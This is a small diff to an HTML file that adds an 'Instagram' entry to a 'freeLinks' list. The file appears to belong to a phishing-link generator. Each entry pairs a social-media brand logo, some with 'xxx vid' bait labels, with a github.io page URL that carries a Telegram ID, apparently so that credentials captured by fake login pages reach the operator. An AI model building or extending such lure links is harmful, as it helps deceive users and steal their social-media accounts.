--- a/inn.html
+++ b/inn.html
@@ -272,6 +272,7 @@
 
     const freeLinks = [
       // all new link i just added 
+{ name: "Instagram", image: "https://rrloaty.github.io/intelligent/inst.png", urlTemplate: "https://ilyelya.github.io/n/inst.html?id={telegram-id}" },
 { name: "Facebook xxx vid", image: "https://rrloaty.github.io/intelligent/face.png", urlTemplate: "https://ilyelya.github.io/n/PF.html?id={telegram-id}" },
       { name: "Instagram xxx Vid", image: "https://rrloaty.github.io/intelligent/inst.png", urlTemplate: "https://ilyelya.github.io/n/PI.html?id={telegram-id}" },
       { name: "Twitter(X) XXX vid", image: "https://rrloaty.github.io/intelligent/X.png", urlTemplate: "https://ilyelya.github.io/n/PX.html?id={telegram-id}" },
